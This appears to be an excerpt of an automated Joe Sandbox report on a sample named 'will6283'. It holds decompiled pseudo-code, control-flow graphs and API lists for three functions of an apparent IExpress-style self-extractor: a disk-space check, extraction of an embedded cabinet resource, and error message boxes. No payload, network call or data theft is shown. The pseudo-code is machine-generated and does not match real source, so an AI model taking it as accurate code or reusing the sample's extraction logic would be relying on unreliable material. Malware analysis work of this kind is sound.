                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                • API String ID: 2436801531-3498133043
                                                • Opcode ID: 98c901e754a26b6299ebca39c40e9f2e79b6b9e4aeeffcc4dbf4739ee097536e
                                                • Instruction ID: 6b3fcd2eb992400e802507c55868c4a2ce7ec614a9dd9aa675e764dd4d4b98fc
                                                • Opcode Fuzzy Hash: 98c901e754a26b6299ebca39c40e9f2e79b6b9e4aeeffcc4dbf4739ee097536e
                                                • Instruction Fuzzy Hash: B4811770B042159AEB71AA389C84BFE76ADAF64384F0400A5F5C6E7191DE798EC18B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 324 106597d-10659b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10659dd-1065a1b GetDiskFreeSpaceA 324->325 326 10659bb-10659d8 call 10644b9 call 1066285 324->326 328 1065ba1-1065bde memset call 1066285 GetLastError FormatMessageA 325->328 329 1065a21-1065a4a MulDiv 325->329 345 1065c05-1065c14 call 1066ce0 326->345 337 1065be3-1065bfc call 10644b9 SetCurrentDirectoryA 328->337 329->328 332 1065a50-1065a6c GetVolumeInformationA 329->332 334 1065ab5-1065aca SetCurrentDirectoryA 332->334 335 1065a6e-1065ab0 memset call 1066285 GetLastError FormatMessageA 332->335 339 1065acc-1065ad1 334->339 335->337 351 1065c02 337->351 343 1065ae2-1065ae4 339->343 344 1065ad3-1065ad8 339->344 349 1065ae6 343->349 350 1065ae7-1065af8 343->350 344->343 347 1065ada-1065ae0 344->347 347->339 347->343 349->350 353 1065af9-1065afb 350->353 354 1065c04 351->354 355 1065b05-1065b08 353->355 356 1065afd-1065b03 353->356 354->345 357 1065b20-1065b27 355->357 358 1065b0a-1065b1b call 10644b9 355->358 356->353 356->355 359 1065b52-1065b5b 357->359 360 1065b29-1065b33 357->360 358->351 363 1065b62-1065b6d 359->363 360->359 362 1065b35-1065b50 360->362 362->363 365 1065b76-1065b7d 363->365 366 1065b6f-1065b74 363->366 368 1065b83 365->368 369 1065b7f-1065b81 365->369 367 1065b85 366->367 370 1065b96-1065b9f 367->370 371 1065b87-1065b94 call 106268b 367->371 368->367 369->367 370->354 371->354
                                                C-Code - Quality: 96%
                                                			E0106597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v16;
                                                				char _v276;
                                                				char _v788;
                                                				long _v792;
                                                				long _v796;
                                                				long _v800;
                                                				signed int _v804;
                                                				long _v808;
                                                				int _v812;
                                                				long _v816;
                                                				long _v820;
                                                				void* __ebx;
                                                				void* __esi;
                                                				signed int _t46;
                                                				int _t50;
                                                				signed int _t55;
                                                				void* _t66;
                                                				int _t69;
                                                				signed int _t73;
                                                				signed short _t78;
                                                				signed int _t87;
                                                				signed int _t101;
                                                				int _t102;
                                                				unsigned int _t103;
                                                				unsigned int _t105;
                                                				signed int _t111;
                                                				long _t112;
                                                				signed int _t116;
                                                				CHAR* _t118;
                                                				signed int _t119;
                                                				signed int _t120;
                                                
                                                				_t114 = __edi;
                                                				_t46 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t46 ^ _t120;
                                                				_v804 = __edx;
                                                				_t118 = __ecx;
                                                				GetCurrentDirectoryA(0x104,  &_v276);
                                                				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                				if(_t50 != 0) {
                                                					_push(__edi);
                                                					_v796 = 0;
                                                					_v792 = 0;
                                                					_v800 = 0;
                                                					_v808 = 0;
                                                					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                					__eflags = _t55;
                                                					if(_t55 == 0) {
                                                						L29:
                                                						memset( &_v788, 0, 0x200);
                                                						 *0x1069124 = E01066285();
                                                						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                						_t110 = 0x4b0;
                                                						L30:
                                                						__eflags = 0;
                                                						E010644B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                						SetCurrentDirectoryA( &_v276);
                                                						L31:
                                                						_t66 = 0;
                                                						__eflags = 0;
                                                						L32:
                                                						_pop(_t114);
                                                						goto L33;
                                                					}
                                                					_t69 = _v792 * _v796;
                                                					_v812 = _t69;
                                                					_t116 = MulDiv(_t69, _v800, 0x400);
                                                					__eflags = _t116;
                                                					if(_t116 == 0) {
                                                						goto L29;
                                                					}
                                                					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                					__eflags = _t73;
                                                					if(_t73 != 0) {
                                                						SetCurrentDirectoryA( &_v276); // executed
                                                						_t101 =  &_v16;
                                                						_t111 = 6;
                                                						_t119 = _t118 - _t101;
                                                						__eflags = _t119;
                                                						while(1) {
                                                							_t22 = _t111 - 4; // 0x2
                                                							__eflags = _t22;
                                                							if(_t22 == 0) {
                                                								break;
                                                							}
                                                							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                							__eflags = _t87;
                                                							if(_t87 == 0) {
                                                								break;
                                                							}
                                                							 *_t101 = _t87;
                                                							_t101 = _t101 + 1;
                                                							_t111 = _t111 - 1;
                                                							__eflags = _t111;
                                                							if(_t111 != 0) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						__eflags = _t111;
                                                						if(_t111 == 0) {
                                                							_t101 = _t101 - 1;
                                                							__eflags = _t101;
                                                						}
                                                						 *_t101 = 0;
                                                						_t112 = 0x200;
                                                						_t102 = _v812;
                                                						_t78 = 0;
                                                						_t118 = 8;
                                                						while(1) {
                                                							__eflags = _t102 - _t112;
                                                							if(_t102 == _t112) {
                                                								break;
                                                							}
                                                							_t112 = _t112 + _t112;
                                                							_t78 = _t78 + 1;
                                                							__eflags = _t78 - _t118;
                                                							if(_t78 < _t118) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						__eflags = _t78 - _t118;
                                                						if(_t78 != _t118) {
                                                							__eflags =  *0x1069a34 & 0x00000008;
                                                							if(( *0x1069a34 & 0x00000008) == 0) {
                                                								L20:
                                                								_t103 =  *0x1069a38; // 0x0
                                                								_t110 =  *((intOrPtr*)(0x10689e0 + (_t78 & 0x0000ffff) * 4));
                                                								L21:
                                                								__eflags = (_v804 & 0x00000003) - 3;
                                                								if((_v804 & 0x00000003) != 3) {
                                                									__eflags = _v804 & 0x00000001;
                                                									if((_v804 & 0x00000001) == 0) {
                                                										__eflags = _t103 - _t116;
                                                									} else {
                                                										__eflags = _t110 - _t116;
                                                									}
                                                								} else {
                                                									__eflags = _t103 + _t110 - _t116;
                                                								}
                                                								if(__eflags <= 0) {
                                                									 *0x1069124 = 0;
                                                									_t66 = 1;
                                                								} else {
                                                									_t66 = E0106268B(_a4, _t110, _t103,  &_v16);
                                                								}
                                                								goto L32;
                                                							}
                                                							__eflags = _v816 & 0x00008000;
                                                							if((_v816 & 0x00008000) == 0) {
                                                								goto L20;
                                                							}
                                                							_t105 =  *0x1069a38; // 0x0
                                                							_t110 =  *((intOrPtr*)(0x10689e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10689e0 + (_t78 & 0x0000ffff) * 4));
                                                							_t103 = (_t105 >> 2) +  *0x1069a38;
                                                							goto L21;
                                                						}
                                                						_t110 = 0x4c5;
                                                						E010644B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                						goto L31;
                                                					}
                                                					memset( &_v788, 0, 0x200);
                                                					 *0x1069124 = E01066285();
                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                					_t110 = 0x4f9;
                                                					goto L30;
                                                				} else {
                                                					_t110 = 0x4bc;
                                                					E010644B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                					 *0x1069124 = E01066285();
                                                					_t66 = 0;
                                                					L33:
                                                					return E01066CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                				}
                                                			}



































                                                0x0106597d
                                                0x01065988
                                                0x0106598f
                                                0x0106599a
                                                0x010659a6
                                                0x010659a8
                                                0x010659af
                                                0x010659b9
                                                0x010659dd
                                                0x010659e4
                                                0x010659f1
                                                0x010659fe
                                                0x01065a0b
                                                0x01065a13
                                                0x01065a19
                                                0x01065a1b
                                                0x01065ba1
                                                0x01065baf
                                                0x01065bbd
                                                0x01065bd8
                                                0x01065bde
                                                0x01065be3
                                                0x01065bec
                                                0x01065bf0
                                                0x01065bfc
                                                0x01065c02
                                                0x01065c02
                                                0x01065c02
                                                0x01065c04
                                                0x01065c04
                                                0x00000000
                                                0x01065c04
                                                0x01065a27
                                                0x01065a3a
                                                0x01065a46
                                                0x01065a48
                                                0x01065a4a
                                                0x00000000
                                                0x00000000
                                                0x01065a64
                                                0x01065a6a
                                                0x01065a6c
                                                0x01065abc
                                                0x01065ac2
                                                0x01065ac9
                                                0x01065aca
                                                0x01065aca
                                                0x01065acc
                                                0x01065acc
                                                0x01065acf
                                                0x01065ad1
                                                0x00000000
                                                0x00000000
                                                0x01065ad3
                                                0x01065ad6
                                                0x01065ad8
                                                0x00000000
                                                0x00000000
                                                0x01065ada
                                                0x01065adc
                                                0x01065add
                                                0x01065add
                                                0x01065ae0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01065ae0
                                                0x01065ae2
                                                0x01065ae4
                                                0x01065ae6
                                                0x01065ae6
                                                0x01065ae6
                                                0x01065ae9
                                                0x01065aeb
                                                0x01065af0
                                                0x01065af6
                                                0x01065af8
                                                0x01065af9
                                                0x01065af9
                                                0x01065afb
                                                0x00000000
                                                0x00000000
                                                0x01065afd
                                                0x01065aff
                                                0x01065b00
                                                0x01065b03
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01065b03
                                                0x01065b05
                                                0x01065b08
                                                0x01065b20
                                                0x01065b27
                                                0x01065b52
                                                0x01065b52
                                                0x01065b5b
                                                0x01065b62
                                                0x01065b6b
                                                0x01065b6d
                                                0x01065b76
                                                0x01065b7d
                                                0x01065b83
                                                0x01065b7f
                                                0x01065b7f
                                                0x01065b7f
                                                0x01065b6f
                                                0x01065b72
                                                0x01065b72
                                                0x01065b85
                                                0x01065b98
                                                0x01065b9e
                                                0x01065b87
                                                0x01065b8f
                                                0x01065b8f
                                                0x00000000
                                                0x01065b85
                                                0x01065b29
                                                0x01065b33
                                                0x00000000
                                                0x00000000
                                                0x01065b35
                                                0x01065b48
                                                0x01065b4a
                                                0x00000000
                                                0x01065b4a
                                                0x01065b0f
                                                0x01065b16
                                                0x00000000
                                                0x01065b16
                                                0x01065a7c
                                                0x01065a8a
                                                0x01065aa5
                                                0x01065aab
                                                0x00000000
                                                0x010659bb
                                                0x010659c0
                                                0x010659c7
                                                0x010659d1
                                                0x010659d6
                                                0x01065c05
                                                0x01065c14
                                                0x01065c14

                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010659A8
                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 010659AF
                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 01065A13
                                                • MulDiv.KERNEL32(?,?,00000400), ref: 01065A40
                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 01065A64
                                                • memset.MSVCRT ref: 01065A7C
                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 01065A98
                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 01065AA5
                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 01065BFC
                                                  • Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
                                                  • Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
                                                  • Part of subcall function 01066285: GetLastError.KERNEL32(01065BBC), ref: 01066285
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                • String ID:
                                                • API String ID: 4237285672-0
                                                • Opcode ID: 4f6f75118076e57558074a3c62321102331bee4462e9d74afb4dde93f8a86712
                                                • Instruction ID: bdffdd46e96ca1536e3e447e83b38c039a17080f59459ccb56f628c391979702
                                                • Opcode Fuzzy Hash: 4f6f75118076e57558074a3c62321102331bee4462e9d74afb4dde93f8a86712
                                                • Instruction Fuzzy Hash: 127182B1A0020DAFEB65DF64CC85BFB77ACEB48384F0440A9F586D7144DA359E858F60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 374 1064fe0-106501a call 106468f FindResourceA LoadResource LockResource 377 1065020-1065027 374->377 378 1065161-1065163 374->378 379 1065057-106505e call 1064efd 377->379 380 1065029-1065051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 1065060-1065077 call 10644b9 379->383 384 106507c-10650b4 379->384 380->379 388 1065107-106510e 383->388 389 10650b6-10650da 384->389 390 10650e8-1065104 call 10644b9 384->390 392 1065110-1065117 FreeResource 388->392 393 106511d-106511f 388->393 398 1065106 389->398 402 10650dc 389->402 390->398 392->393 395 1065121-1065127 393->395 396 106513a-1065141 393->396 395->396 399 1065129-1065135 call 10644b9 395->399 400 1065143-106514a 396->400 401 106515f 396->401 398->388 399->396 400->401 404 106514c-1065159 SendMessageA 400->404 401->378 405 10650e3-10650e6 402->405 404->401 405->390 405->398
                                                C-Code - Quality: 77%
                                                			E01064FE0(void* __edi, void* __eflags) {
                                                				void* __ebx;
                                                				void* _t8;
                                                				struct HWND__* _t9;
                                                				int _t10;
                                                				void* _t12;
                                                				struct HWND__* _t24;
                                                				struct HWND__* _t27;
                                                				intOrPtr _t29;
                                                				void* _t33;
                                                				int _t34;
                                                				CHAR* _t36;
                                                				int _t37;
                                                				intOrPtr _t47;
                                                
                                                				_t33 = __edi;
                                                				_t36 = "CABINET";
                                                				 *0x1069144 = E0106468F(_t36, 0, 0);
                                                				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                				 *0x1069140 = _t8;
                                                				if(_t8 == 0) {
                                                					return _t8;
                                                				}
                                                				_t9 =  *0x1068584; // 0x0
                                                				if(_t9 != 0) {
                                                					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                					ShowWindow(GetDlgItem( *0x1068584, 0x841), 5);
                                                				}
                                                				_t10 = E01064EFD(0, 0);
                                                				if(_t10 != 0) {
                                                					__imp__#20(E01064CA0, E01064CC0, E01064980, E01064A50, E01064AD0, E01064B60, E01064BC0, 1, 0x1069148, _t33);
                                                					_t34 = _t10;
                                                					if(_t34 == 0) {
                                                						L8:
                                                						_t29 =  *0x1069148; // 0x0
                                                						_t24 =  *0x1068584; // 0x0
                                                						E010644B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                						_t37 = 0;
                                                						L9:
                                                						goto L10;
                                                					}
                                                					__imp__#22(_t34, "*MEMCAB", 0x1061140, 0, E01064CD0, 0, 0x1069140); // executed
                                                					_t37 = _t10;
                                                					if(_t37 == 0) {
                                                						goto L9;
                                                					}
                                                					__imp__#23(_t34); // executed
                                                					if(_t10 != 0) {
                                                						goto L9;
                                                					}
                                                					goto L8;
                                                				} else {
                                                					_t27 =  *0x1068584; // 0x0
                                                					E010644B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                					_t37 = 0;
                                                					L10:
                                                					_t12 =  *0x1069140; // 0x0
                                                					if(_t12 != 0) {
                                                						FreeResource(_t12);
                                                						 *0x1069140 = 0;
                                                					}
                                                					if(_t37 == 0) {
                                                						_t47 =  *0x10691d8; // 0x0
                                                						if(_t47 == 0) {
                                                							E010644B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                						}
                                                					}
                                                					if(( *0x1068a38 & 0x00000001) == 0 && ( *0x1069a34 & 0x00000001) == 0) {
                                                						SendMessageA( *0x1068584, 0xfa1, _t37, 0);
                                                					}
                                                					return _t37;
                                                				}
                                                			}
















                                                0x01064fe0
                                                0x01064fe6
                                                0x01064ff9
                                                0x0106500d
                                                0x01065013
                                                0x0106501a
                                                0x01065163
                                                0x01065163
                                                0x01065020
                                                0x01065027
                                                0x01065037
                                                0x01065051
                                                0x01065051
                                                0x01065057
                                                0x0106505e
                                                0x010650a7
                                                0x010650ad
                                                0x010650b4
                                                0x010650e8
                                                0x010650e8
                                                0x010650ee
                                                0x010650ff
                                                0x01065104
                                                0x01065106
                                                0x00000000
                                                0x01065106
                                                0x010650cd
                                                0x010650d3
                                                0x010650da
                                                0x00000000
                                                0x00000000
                                                0x010650dd
                                                0x010650e6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01065060
                                                0x01065060
                                                0x01065070
                                                0x01065075
                                                0x01065107
                                                0x01065107
                                                0x0106510e
                                                0x01065111
                                                0x01065117
                                                0x01065117
                                                0x0106511f
                                                0x01065121
                                                0x01065127
                                                0x01065135
                                                0x01065135
                                                0x01065127
                                                0x01065141
                                                0x01065159
                                                0x01065159
                                                0x00000000
                                                0x0106515f

                                                APIs
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
                                                  • Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
                                                  • Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
                                                  • Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
                                                  • Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
                                                  • Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF
                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01064FFE
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 01065006
                                                • LockResource.KERNEL32(00000000), ref: 0106500D
                                                • GetDlgItem.USER32(00000000,00000842), ref: 01065030
                                                • ShowWindow.USER32(00000000), ref: 01065037
                                                • GetDlgItem.USER32(00000841,00000005), ref: 0106504A
                                                • ShowWindow.USER32(00000000), ref: 01065051
                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 01065111
                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 01065159
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                • String ID: *MEMCAB$CABINET
                                                • API String ID: 1305606123-2642027498
                                                • Opcode ID: 275d9b4381fcb7337b0bd681d24622a464f46d9397645747337abd531cedfc8c
                                                • Instruction ID: c33928d6e14f7d0a6e0e53ab57df87ea9c21cc57487bb752d9cc99adc3aeaa41
                                                • Opcode Fuzzy Hash: 275d9b4381fcb7337b0bd681d24622a464f46d9397645747337abd531cedfc8c
                                                • Instruction Fuzzy Hash: AD31E7B0740315FFE7706A66AD89F673ADCA744B99F044019F9C1EF199DA7E8C408760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 406 10644b9-10644f8 407 10644fe-1064525 LoadStringA 406->407 408 1064679-106467b 406->408 409 1064527-106452e call 106681f 407->409 410 1064562-1064568 407->410 411 106467c-106468c call 1066ce0 408->411 418 1064530-106453d call 10667c9 409->418 419 106453f 409->419 414 106456b-1064570 410->414 414->414 417 1064572-106457c 414->417 420 106457e-1064580 417->420 421 10645c9-10645cb 417->421 418->419 425 1064544-1064554 MessageBoxA 418->425 419->425 426 1064583-1064588 420->426 423 1064607-1064617 LocalAlloc 421->423 424 10645cd-10645cf 421->424 429 106455a-106455d 423->429 430 106461d-1064628 call 1061680 423->430 428 10645d2-10645d7 424->428 425->429 426->426 431 106458a-106458c 426->431 428->428 433 10645d9-10645ed LocalAlloc 428->433 429->411 437 106462d-106463d MessageBeep call 106681f 430->437 432 106458f-1064594 431->432 432->432 435 1064596-10645ad LocalAlloc 432->435 433->429 436 10645f3-1064605 call 106171e 433->436 435->429 439 10645af-10645c7 call 106171e 435->439 436->437 444 106464e 437->444 445 106463f-106464c call 10667c9 437->445 439->437 448 1064653-1064677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                C-Code - Quality: 94%
                                                			E010644B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                				signed int _v8;
                                                				char _v64;
                                                				char _v576;
                                                				void* _v580;
                                                				struct HWND__* _v584;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t34;
                                                				void* _t37;
                                                				signed int _t39;
                                                				intOrPtr _t43;
                                                				signed int _t44;
                                                				signed int _t49;
                                                				signed int _t52;
                                                				void* _t54;
                                                				intOrPtr _t55;
                                                				intOrPtr _t58;
                                                				intOrPtr _t59;
                                                				int _t64;
                                                				void* _t66;
                                                				intOrPtr* _t67;
                                                				signed int _t69;
                                                				intOrPtr* _t73;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t77;
                                                				void* _t80;
                                                				void* _t81;
                                                				void* _t82;
                                                				intOrPtr* _t84;
                                                				void* _t85;
                                                				signed int _t89;
                                                
                                                				_t75 = __edx;
                                                				_t34 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t34 ^ _t89;
                                                				_v584 = __ecx;
                                                				_t83 = "LoadString() Error.  Could not load string resource.";
                                                				_t67 = _a4;
                                                				_t69 = 0xd;
                                                				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                				_t80 = _t83 + _t69 + _t69;
                                                				_v580 = _t37;
                                                				asm("movsb");
                                                				if(( *0x1068a38 & 0x00000001) != 0) {
                                                					_t39 = 1;
                                                				} else {
                                                					_v576 = 0;
                                                					LoadStringA( *0x1069a3c, _t75,  &_v576, 0x200);
                                                					if(_v576 != 0) {
                                                						_t73 =  &_v576;
                                                						_t16 = _t73 + 1; // 0x1
                                                						_t75 = _t16;
                                                						do {
                                                							_t43 =  *_t73;
                                                							_t73 = _t73 + 1;
                                                						} while (_t43 != 0);
                                                						_t84 = _v580;
                                                						_t74 = _t73 - _t75;
                                                						if(_t84 == 0) {
                                                							if(_t67 == 0) {
                                                								_t27 = _t74 + 1; // 0x2
                                                								_t83 = _t27;
                                                								_t44 = LocalAlloc(0x40, _t83);
                                                								_t80 = _t44;
                                                								if(_t80 == 0) {
                                                									goto L6;
                                                								} else {
                                                									_t75 = _t83;
                                                									_t74 = _t80;
                                                									E01061680(_t80, _t83,  &_v576);
                                                									goto L23;
                                                								}
                                                							} else {
                                                								_t76 = _t67;
                                                								_t24 = _t76 + 1; // 0x1
                                                								_t85 = _t24;
                                                								do {
                                                									_t55 =  *_t76;
                                                									_t76 = _t76 + 1;
                                                								} while (_t55 != 0);
                                                								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                								_t83 = _t25 + _t74;
                                                								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                								_t80 = _t44;
                                                								if(_t80 == 0) {
                                                									goto L6;
                                                								} else {
                                                									E0106171E(_t80, _t83,  &_v576, _t67);
                                                									goto L23;
                                                								}
                                                							}
                                                						} else {
                                                							_t77 = _t67;
                                                							_t18 = _t77 + 1; // 0x1
                                                							_t81 = _t18;
                                                							do {
                                                								_t58 =  *_t77;
                                                								_t77 = _t77 + 1;
                                                							} while (_t58 != 0);
                                                							_t75 = _t77 - _t81;
                                                							_t82 = _t84 + 1;
                                                							do {
                                                								_t59 =  *_t84;
                                                								_t84 = _t84 + 1;
                                                							} while (_t59 != 0);
                                                							_t21 = _t74 + 0x64; // 0x65
                                                							_t83 = _t21 + _t84 - _t82 + _t75;
                                                							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                							_t80 = _t44;
                                                							if(_t80 == 0) {
                                                								goto L6;
                                                							} else {
                                                								_push(_v580);
                                                								E0106171E(_t80, _t83,  &_v576, _t67);
                                                								L23:
                                                								MessageBeep(_a12);
                                                								if(E0106681F(_t67) == 0) {
                                                									L25:
                                                									_t49 = 0x10000;
                                                								} else {
                                                									_t54 = E010667C9(_t74, _t74);
                                                									_t49 = 0x190000;
                                                									if(_t54 == 0) {
                                                										goto L25;
                                                									}
                                                								}
                                                								_t52 = MessageBoxA(_v584, _t80, "lega", _t49 | _a12 | _a16); // executed
                                                								_t83 = _t52;
                                                								LocalFree(_t80);
                                                								_t39 = _t52;
                                                							}
                                                						}
                                                					} else {
                                                						if(E0106681F(_t67) == 0) {
                                                							L4:
                                                							_t64 = 0x10010;
                                                						} else {
                                                							_t66 = E010667C9(0, 0);
                                                							_t64 = 0x190010;
                                                							if(_t66 == 0) {
                                                								goto L4;
                                                							}
                                                						}
                                                						_t44 = MessageBoxA(_v584,  &_v64, "lega", _t64);
                                                						L6:
                                                						_t39 = _t44 | 0xffffffff;
                                                					}
                                                				}
                                                				return E01066CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                			}



































                                                0x010644b9
                                                0x010644c4
                                                0x010644cb
                                                0x010644d8
                                                0x010644e4
                                                0x010644eb
                                                0x010644ee
                                                0x010644ef
                                                0x010644ef
                                                0x010644f1
                                                0x010644f7
                                                0x010644f8
                                                0x0106467b
                                                0x010644fe
                                                0x01064509
                                                0x01064518
                                                0x01064525
                                                0x01064562
                                                0x01064568
                                                0x01064568
                                                0x0106456b
                                                0x0106456b
                                                0x0106456d
                                                0x0106456e
                                                0x01064572
                                                0x01064578
                                                0x0106457c
                                                0x010645cb
                                                0x01064607
                                                0x01064607
                                                0x0106460d
                                                0x01064613
                                                0x01064617
                                                0x00000000
                                                0x0106461d
                                                0x01064623
                                                0x01064626
                                                0x01064628
                                                0x00000000
                                                0x01064628
                                                0x010645cd
                                                0x010645cd
                                                0x010645cf
                                                0x010645cf
                                                0x010645d2
                                                0x010645d2
                                                0x010645d4
                                                0x010645d5
                                                0x010645db
                                                0x010645de
                                                0x010645e3
                                                0x010645e9
                                                0x010645ed
                                                0x00000000
                                                0x010645f3
                                                0x010645fd
                                                0x00000000
                                                0x01064602
                                                0x010645ed
                                                0x0106457e
                                                0x0106457e
                                                0x01064580
                                                0x01064580
                                                0x01064583
                                                0x01064583
                                                0x01064585
                                                0x01064586
                                                0x0106458a
                                                0x0106458c
                                                0x0106458f
                                                0x0106458f
                                                0x01064591
                                                0x01064592
                                                0x0106459b
                                                0x0106459e
                                                0x010645a3
                                                0x010645a9
                                                0x010645ad
                                                0x00000000
                                                0x010645af
                                                0x010645af
                                                0x010645bf
                                                0x0106462d
                                                0x01064630
                                                0x0106463d
                                                0x0106464e
                                                0x0106464e
                                                0x0106463f
                                                0x01064640
                                                0x01064647
                                                0x0106464c
                                                0x00000000
                                                0x00000000
                                                0x0106464c
                                                0x01064666
                                                0x0106466d
                                                0x0106466f
                                                0x01064675
                                                0x01064675
                                                0x010645ad
                                                0x01064527
                                                0x0106452e
                                                0x0106453f
                                                0x0106453f
                                                0x01064530
                                                0x01064531
                                                0x01064538
                                                0x0106453d
                                                0x00000000
                                                0x00000000
                                                0x0106453d
                                                0x01064554
                                                0x0106455a
                                                0x0106455a
                                                0x0106455a
                                                0x01064525
                                                0x0106468c

                                                APIs
                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
                                                • MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
